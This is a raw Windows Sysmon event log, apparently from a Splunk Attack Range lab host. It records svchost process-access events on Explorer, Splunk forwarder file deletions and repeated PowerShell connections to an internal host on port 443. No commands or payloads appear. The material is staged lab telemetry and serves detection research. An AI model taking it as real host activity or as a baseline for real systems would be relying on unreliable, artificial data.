14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:19.682{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908E28468E8C010859447DD0022960DA,SHA256=9FB127B63B784F4972364391DCDA3755B7EDCAD300034DBC5C64A52E652ED532,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:19.617{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BF81A0CC7CC72FFBAEE64723A2FFD1F9,SHA256=C2317243C9850FC7BA791ACD6918E07AF69C81E4CF939BAEE0839849FA24845E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:20.715{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643445D8540A34517367D1EDB7DBEC77,SHA256=076839557BEFD7469580C40EB2F664C9A2467F364101FC802FFE2CD2379D178D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:45.529{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52315-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035341582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:45.160{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52314-false10.0.1.12-8000- 23542300x800000000000000035341585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:21.749{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3B72EEB37723C365E1E4EC4C13E804,SHA256=A37117A1BCB55792E7FF1A97BB3682C8B259AAFD61F016D27303877913FEA49A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:22.933{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:22.780{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6314BBB39D48BCB60471EC1B647A35,SHA256=0F0D5F137BF3CFFAD8C7A3BD50D0B0B7769B872D858A034579E21731E3A5937C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:23.796{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7798FD27D2BA879992C6869957A4149C,SHA256=8B38BC70DE622A437787DD9ABB174530F1DBD16E4FC79B032B0C48022DC44F6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:24.813{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69996F1066A31771B291CD471B5B35F4,SHA256=27EDF10DC9A4D2911FCAB7E175190B51C713A22591BCDFD11B4C986E70798D50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:24.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FB5FEBEC0BFE9F4B7196FE2D3AB4DA81,SHA256=E345711F7BBBE561B7596829E45B48BE949B1D2E5A6980D5AE23230CB017B48E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:49.906{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52316-false10.0.1.12-8089- 23542300x800000000000000035341594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:25.831{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00DE3213917AEC1EBFDC072F7FA06F54,SHA256=63EDB08CB5E9D396F98220D4CADAA642E708AB8016449D3582665222F6846FA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:51.106{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52318-false10.0.1.12-8000- 354300x800000000000000035341592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:50.544{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52317-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:26.861{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 